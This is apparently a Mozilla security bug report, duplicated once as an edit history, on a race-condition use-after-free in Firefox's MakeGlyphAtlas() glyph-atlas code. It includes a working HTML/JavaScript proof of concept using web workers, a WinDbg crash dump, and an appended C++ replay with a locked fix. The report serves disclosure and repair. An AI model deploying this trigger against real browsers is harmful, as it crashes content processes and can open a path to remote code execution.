VULNERABILITY DETAILS

A specially crafted HTML file can trigger a use-after-free in the GFX code in MakeGlyphAtlas(). This bug can potentially be exploited to achieve one-click remote code execution in the content process.

gGlyphMask is a static variable in gfxFontMissingGlyphs.cpp, so it is intended to be initialized/constructed only once:

```cpp
static RefPtr<SourceSurface> gGlyphMask;
```

However, the code inside the function MakeGlyphAtlas() in gfxFontMissingGlyphs.cpp is subject to a race condition:

```cpp
static bool MakeGlyphAtlas(const DeviceColor& aColor) {
  ...
  if (!gGlyphMask) {
    gGlyphMask = gGlyphDrawTarget->CreateSourceSurfaceFromData(
        ...
  }
  ...
}
```

When a JS call like ctx0.fillText("⏗⚀") from the PoC is made from a web worker, MakeGlyphAtlas() is executed on the worker thread. If two threads check gGlyphMask and it is null in both cases, then they both satisfy the `if (!gGlyphMask)` clause and both try to call CreateSourceSurfaceFromData() to create a new SourceSurfaceSkia object and assign it as a RefPtr to gGlyphMask. One thread executes CreateSourceSurfaceFromData() sooner and creates a SourceSurfaceSkia object first. Then, when the second thread executes CreateSourceSurfaceFromData() and tries to assign the newly created second SourceSurfaceSkia object to gGlyphMask, gGlyphMask is no longer null (unlike when it was null-checked), so the assignment ("=") operation releases the first-created SourceSurfaceSkia object.

After that, when the first thread continues to execute the subsequent code, the operations against gGlyphMask are a use-after-free:

```cpp
gGlyphDrawTarget->MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
                              DrawOptions(1.0f, CompositionOp::OP_SOURCE));
```

VERSION
Firefox 113.0a1 (2023-03-19) (64-bit)

OS
Windows 11 Home 22H2 (Build 22621.1413)

REPRODUCTION CASE (UAF_MakeGlyphAtlas_PoC.html)

```html
<script>
workers = [];
// Each worker creates its own OffscreenCanvas and calls fillText() twice on
// a string of glyphs no font supplies, which reaches MakeGlyphAtlas() on the
// worker thread.
workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
workerCode += 'setTimeout(function(){ctx0.fillText("⏗⚀", 47,15);}, 2);\n'
workerCode += 'setTimeout(function(){ctx0.fillText("⏗⚀", 47,15);}, 1);\n'
// Ten workers race on the static gGlyphMask.
for(var i = 0; i < 10; i++) {
  var blob = new Blob([workerCode],{type: "text/javascript"});
  workers[i] = new Worker(window.URL.createObjectURL(blob));
}
// Reload and retry until the race hits.
setTimeout(function(){location.reload();},300);
</script>
```

Type of crash: content process

Crash State:

```text
(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> r
rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
r14=000000ffebb7ac20 r15=000000ffebb7adc0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> dv
       aSurface = 0x000002d6`3522d800
          aLock = 0x000000ff`ebb7ac10 Nothing
        aBounds = <value unavailable>
        aMatrix = <value unavailable>
            map = struct mozilla::gfx::DataSourceSurface::MappedSurface
         pixmap = class SkPixmap
          image = class sk_sp<SkImage>
    dataSurface = <value unavailable>
    releaseProc = <value unavailable>
           surf = <value unavailable>
9:318> k
 # Child-SP          RetAddr               Call Site
00 000000ff`ebb7aa50 00007ff9`d177638c     xul!mozilla::gfx::GetSkImageForSurface+0x36 [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 246]
01 (Inline Function) --------`--------     xul!mozilla::gfx::ExtractAlphaForSurface+0xb [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 460]
02 000000ff`ebb7abd0 00007ff9`d18d527e     xul!mozilla::gfx::DrawTargetSkia::MaskSurface+0x12c [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 1441]
03 (Inline Function) --------`--------     xul!MakeGlyphAtlas+0x1b1 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 112]
04 (Inline Function) --------`--------     xul!GetGlyphAtlas+0x222 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 131]
05 000000ff`ebb7ad70 00007ff9`d18c062a     xul!gfxFontMissingGlyphs::DrawMissingGlyph+0x4fe [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 418]
06 000000ff`ebb7aef0 00007ff9`d0b29ef9     xul!gfxFont::DrawMissingGlyph+0x3ba [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2202]
07 (Inline Function) --------`--------     xul!gfxFont::DrawGlyphs+0x1be5 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2030]
08 000000ff`ebb7b050 00007ff9`d0a177b9     xul!gfxFont::Draw+0x2179 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2530]
09 (Inline Function) --------`--------     xul!gfxTextRun::DrawGlyphs+0x5c [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 429]
0a 000000ff`ebb7bb10 00007ff9`d22906e6     xul!gfxTextRun::Draw+0x4b9 [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 683]
0b 000000ff`ebb7cbf0 00007ff9`d2f4defc     xul!mozilla::dom::CanvasBidiProcessor::DrawText+0x576 [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4124]
0c 000000ff`ebb7ce70 00007ff9`d2f4d8fd     xul!nsBidiPresUtils::ProcessSimpleRun+0x11c [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2390]
0d 000000ff`ebb7cf80 00007ff9`d224b3cf     xul!nsBidiPresUtils::ProcessText+0x1dd [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2165]
0e 000000ff`ebb7d140 00007ff9`d224a72a     xul!mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText+0xc9f [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4448]
0f 000000ff`ebb7d400 00007ff9`d1c9c15a     xul!mozilla::dom::CanvasRenderingContext2D::FillText+0x2a [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 3863]
10 000000ff`ebb7d440 00007ff9`d0831055     xul!mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText+0x2ea [/builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp @ 3904]
11 000000ff`ebb7d5a0 00007ff9`d0eb9e19     xul!mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions>+0x145 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3318]
12 (Inline Function) --------`--------     xul!CallJSNative+0x181 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 459]
13 (Inline Function) --------`--------     xul!js::InternalCallOrConstruct+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 553]
14 (Inline Function) --------`--------     xul!InternalCall+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620]
15 (Inline Function) --------`--------     xul!js::CallFromStack+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 625]
16 000000ff`ebb7d660 00007ff9`d08a0a55     xul!Interpret+0xd479 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 3368]
17 (Inline Function) --------`--------     xul!js::RunScript+0x5c2 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 431]
18 (Inline Function) --------`--------     xul!js::InternalCallOrConstruct+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 585]
19 (Inline Function) --------`--------     xul!InternalCall+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620]
1a 000000ff`ebb7db20 00007ff9`d094ab9f     xul!js::Call+0x755 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 652]
1b 000000ff`ebb7dc30 00007ff9`cf260440     xul!JS::Call+0x2bf [/builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp @ 117]
1c 000000ff`ebb7dd60 00007ff9`cfba8d05     xul!mozilla::dom::Function::Call+0x1a0 [/builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp @ 50]
1d (Inline Function) --------`--------     xul!mozilla::dom::Function::Call+0x144 [/builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h @ 71]
1e 000000ff`ebb7dec0 00007ff9`d2b86376     xul!mozilla::dom::CallbackTimeoutHandler::Call+0x1c5 [/builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp @ 167]
1f 000000ff`ebb7e1a0 00007ff9`cf0da944     xul!mozilla::dom::WorkerPrivate::RunExpiredTimeouts+0x486 [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 5163]
20 000000ff`ebb7e330 00007ff9`cf782505     xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377]
21 (Inline Function) --------`--------     xul!nsTimerImpl::Fire::<lambda_2>::operator()+0x1d [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 656]
22 (Inline Function) --------`--------     xul!mozilla::detail::VariantImplementation<unsigned char,1,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x173 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 309]
23 (Inline Function) --------`--------     xul!mozilla::detail::VariantImplementation<unsigned char,0,nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 318]
24 (Inline Function) --------`--------     xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 902]
25 (Inline Function) --------`--------     xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::match+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 857]
26 000000ff`ebb7e4d0 00007ff9`cf773b73     xul!nsTimerImpl::Fire+0x3a5 [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 654]
27 000000ff`ebb7e660 00007ff9`d2b8c62a     xul!nsTimerEvent::Run+0x63 [/builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp @ 469]
28 000000ff`ebb7e840 00007ff9`cf0da944     xul!mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun+0x2a [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 201]
29 000000ff`ebb7e8a0 00007ff9`d07d9dce     xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377]
2a 000000ff`ebb7ea40 00007ff9`d07eeb9e     xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234]
2b 000000ff`ebb7ede0 00007ff9`cf0da19c     xul!NS_ProcessNextEvent+0x3e [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477]
2c 000000ff`ebb7ee30 00007ff9`cfeabbe2     xul!mozilla::dom::WorkerPrivate::DoRunLoop+0x1cc [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 3281]
2d 000000ff`ebb7ef30 00007ff9`d07d9dce     xul!mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x2a2 [/builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp @ 2049]
2e 000000ff`ebb7f0c0 00007ff9`d07d8985     xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234]
2f (Inline Function) --------`--------     xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477]
30 000000ff`ebb7f460 00007ff9`cf93340f     xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf5 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300]
31 (Inline Function) --------`--------     xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 381]
32 000000ff`ebb7f510 00007ff9`cef5fc7e     xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 375]
33 000000ff`ebb7f560 00007ff9`cf775f03     xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 357]
34 000000ff`ebb7f5c0 00007ffa`0ebc577c     xul!nsThread::ThreadFunc+0xe3 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393]
35 000000ff`ebb7f780 00007ffa`0ec4a411     nss3!_PR_NativeRunThread+0x13c [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421]
36 000000ff`ebb7f800 00007ffa`5c849363     nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140]
37 000000ff`ebb7f830 00007ffa`5dc626bd     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
38 000000ff`ebb7f860 00007ffa`1f6251c8     KERNEL32!BaseThreadInitThunk+0x1d
39 (Inline Function) --------`--------     mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150]
3a 000000ff`ebb7f890 00007ffa`5ecca9f8     mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 592]
3b 000000ff`ebb7f900 00000000`00000000     ntdll!RtlUserThreadStart+0x28
9:318> dx -id 0,9 -r1 ((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)
((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)                 : 0x2d63522d800 [Type: mozilla::gfx::SourceSurface *]
    [+0x008] mWeakRef         [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
    [+0x010] mUserData        [Type: mozilla::gfx::ThreadSafeUserData]
9:318> dx -id 0,9 -r1 (*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))
(*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))                 [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
    [+0x000] mRawPtr          : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
9:318> dx -id 0,9 -r1 ((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)
((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)                 : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
    [+0x000] mRefCnt          [Type: mozilla::detail::RC<unsigned long long,0>]
    [+0x008] mStrongCnt       [Type: mozilla::detail::RC<unsigned long long,0>]
    [+0x010] mPtr             : Unable to read memory at Address 0xe5e5e5e5e5e5e5f5
```

CREDIT INFORMATION
Reporter credit: Looben Yang
Bug 1823365 Comment 0 Edit History
VULNERABILITY DETAILS

A specially crafted HTML file can trigger a use-after-free in the GFX code in `MakeGlyphAtlas()`. This bug can potentially be exploited to achieve one-click remote code execution in the content process.

`gGlyphMask` is a static variable in `gfxFontMissingGlyphs.cpp`, so it is intended to be initialized/constructed only once:

```cpp
static RefPtr<SourceSurface> gGlyphMask;
```

However, the code inside the function `MakeGlyphAtlas()` in `gfxFontMissingGlyphs.cpp` is subject to a race condition:

```cpp
static bool MakeGlyphAtlas(const DeviceColor& aColor) {
  ...
  if (!gGlyphMask) {
    gGlyphMask = gGlyphDrawTarget->CreateSourceSurfaceFromData(
        ...
  }
  ...
}
```

When a JS call like `ctx0.fillText("⏗⚀")` from the PoC is made from a web worker, `MakeGlyphAtlas()` is executed on the worker thread. If two threads check `gGlyphMask` and it is null in both cases, then they both satisfy the `if (!gGlyphMask)` clause and both try to call `CreateSourceSurfaceFromData()` to create a new `SourceSurfaceSkia` object and assign it as a `RefPtr` to `gGlyphMask`. One thread executes `CreateSourceSurfaceFromData()` sooner and creates a `SourceSurfaceSkia` object first. Then, when the second thread executes `CreateSourceSurfaceFromData()` and tries to assign the newly created second `SourceSurfaceSkia` object to `gGlyphMask`, `gGlyphMask` is no longer null (unlike when it was null-checked), so the assignment ("=") operation releases the first-created `SourceSurfaceSkia` object.

After that, when the first thread continues to execute the subsequent code, the operations against `gGlyphMask` are a use-after-free:

```cpp
gGlyphDrawTarget->MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
                              DrawOptions(1.0f, CompositionOp::OP_SOURCE));
```

VERSION
Firefox 113.0a1 (2023-03-19) (64-bit)

OS
Windows 11 Home 22H2 (Build 22621.1413)

REPRODUCTION CASE (UAF_MakeGlyphAtlas_PoC.html)

```html
<script>
workers = [];
// Each worker creates its own OffscreenCanvas and calls fillText() twice on
// a string of glyphs no font supplies, which reaches MakeGlyphAtlas() on the
// worker thread.
workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
workerCode += 'setTimeout(function(){ctx0.fillText("⏗⚀", 47,15);}, 2);\n'
workerCode += 'setTimeout(function(){ctx0.fillText("⏗⚀", 47,15);}, 1);\n'
// Ten workers race on the static gGlyphMask.
for(var i = 0; i < 10; i++) {
  var blob = new Blob([workerCode],{type: "text/javascript"});
  workers[i] = new Worker(window.URL.createObjectURL(blob));
}
// Reload and retry until the race hits.
setTimeout(function(){location.reload();},300);
</script>
```

Type of crash: content process

Crash State:

```text
(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> r
rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
r14=000000ffebb7ac20 r15=000000ffebb7adc0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
```
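The interleaving the report describes, replayed deterministically as an added example (this is not Gecko code and not the fix that landed; `Surface`, the toy `RefPtr`, `ReplayRacyMakeGlyphAtlas()` and `GetGlyphMaskLocked()` are hypothetical stand-ins). It assumes, as the crash's `aSurface` argument suggests, that thread 1 has already loaded the raw pointer it passes to `MaskSurface()` before thread 2's assignment runs. The replay happens on one thread so the outcome is reproducible; a real race would be timing-dependent, which is why the PoC spawns ten workers and reloads. The locked variant shows the two properties a fix needs: the check-and-create must be serialized, and every caller must hold its own strong reference rather than a raw pointer read out of the static.

```cpp
// Added example, not Gecko code: a single-thread replay of the race in the
// report with toy stand-ins for SourceSurface and RefPtr (names hypothetical),
// plus a locked variant for comparison.
#include <cassert>
#include <cstdio>
#include <mutex>
#include <vector>

// Registry of freed surfaces, indexed by id, so results can be checked
// without touching freed memory.
static std::vector<bool> gDestroyed;
static int gCreated = 0;

// Toy SourceSurface: intrusively refcounted, deletes itself on the last Release().
struct Surface {
  int id;
  int refcnt = 0;
  Surface() : id(gCreated++) { gDestroyed.push_back(false); }
  void AddRef() { ++refcnt; }
  void Release() {
    if (--refcnt == 0) {
      gDestroyed[id] = true;
      delete this;
    }
  }
};

// Toy RefPtr with the usual assignment shape: AddRef the new pointer, swap it
// in, then Release the old one. Nothing here is atomic or locked.
template <class T>
class RefPtr {
  T* mRawPtr = nullptr;
 public:
  RefPtr() = default;
  RefPtr(T* p) : mRawPtr(p) { if (p) p->AddRef(); }
  RefPtr(const RefPtr& o) : RefPtr(o.mRawPtr) {}
  ~RefPtr() { if (mRawPtr) mRawPtr->Release(); }
  RefPtr& operator=(T* p) {
    if (p) p->AddRef();
    T* old = mRawPtr;
    mRawPtr = p;
    if (old) old->Release();   // frees the previous surface if nobody else holds it
    return *this;
  }
  RefPtr& operator=(const RefPtr& o) { return *this = o.mRawPtr; }
  explicit operator bool() const { return mRawPtr != nullptr; }
  T* get() const { return mRawPtr; }
};

static RefPtr<Surface> gGlyphMask;   // the unsynchronized static from the report
static std::mutex gGlyphMaskLock;    // used only by the locked variant below

// Replays the report's interleaving step by step on one thread. Returns true
// if the surface thread 1 is about to hand to MaskSurface() has already been
// freed by thread 2's assignment.
static bool ReplayRacyMakeGlyphAtlas() {
  gGlyphMask = nullptr;
  bool t1SawNull = !gGlyphMask;               // thread 1: if (!gGlyphMask) -> true
  bool t2SawNull = !gGlyphMask;               // thread 2: same check, also true
  if (t1SawNull) gGlyphMask = new Surface();  // thread 1 installs s1 (refcnt 1)
  Surface* t1Arg = gGlyphMask.get();          // thread 1 reads the raw pointer for MaskSurface(), then is preempted
  int t1Id = t1Arg->id;
  if (t2SawNull) gGlyphMask = new Surface();  // thread 2 installs s2; operator= releases s1 (refcnt 0, freed)
  // thread 1 resumes: MaskSurface(..., t1Arg, ...) would now dereference freed memory
  return gDestroyed[t1Id];
}

// Hardened shape (added here, not Gecko's fix): check-and-create runs under a
// lock, and the caller receives a strong reference so a later replacement of
// the static cannot free the surface out from under it.
static RefPtr<Surface> GetGlyphMaskLocked() {
  std::lock_guard<std::mutex> guard(gGlyphMaskLock);
  if (!gGlyphMask) {
    gGlyphMask = new Surface();
  }
  return gGlyphMask;   // copy: the AddRef happens while the lock is still held
}

// Two callers (sequential here; the lock serializes real threads the same way).
// Returns true if exactly one surface was created and both callers hold the
// same live object.
static bool CheckLockedVersion() {
  { std::lock_guard<std::mutex> guard(gGlyphMaskLock); gGlyphMask = nullptr; }
  int before = gCreated;
  RefPtr<Surface> a = GetGlyphMaskLocked();
  RefPtr<Surface> b = GetGlyphMaskLocked();
  return gCreated == before + 1 && a.get() == b.get() &&
         !gDestroyed[a.get()->id] && a.get()->refcnt == 3;  // static + a + b
}

int main() {
  std::printf("racy replay: thread 1's surface freed before use = %s\n",
              ReplayRacyMakeGlyphAtlas() ? "yes" : "no");
  std::printf("locked variant: one live shared surface = %s\n",
              CheckLockedVersion() ? "yes" : "no");
  return 0;
}
```

Compile with any C++11 compiler (`c++ -std=c++11 replay.cpp`). The racy replay reports the surface as freed because the second `operator=` drops the only strong reference to s1 while thread 1 still holds a raw pointer to it; the 0xe5 fill in the crash dump is the freed allocation being poisoned. The locked variant creates one surface and leaves it at refcount 3, so neither caller can observe a free until both have let go.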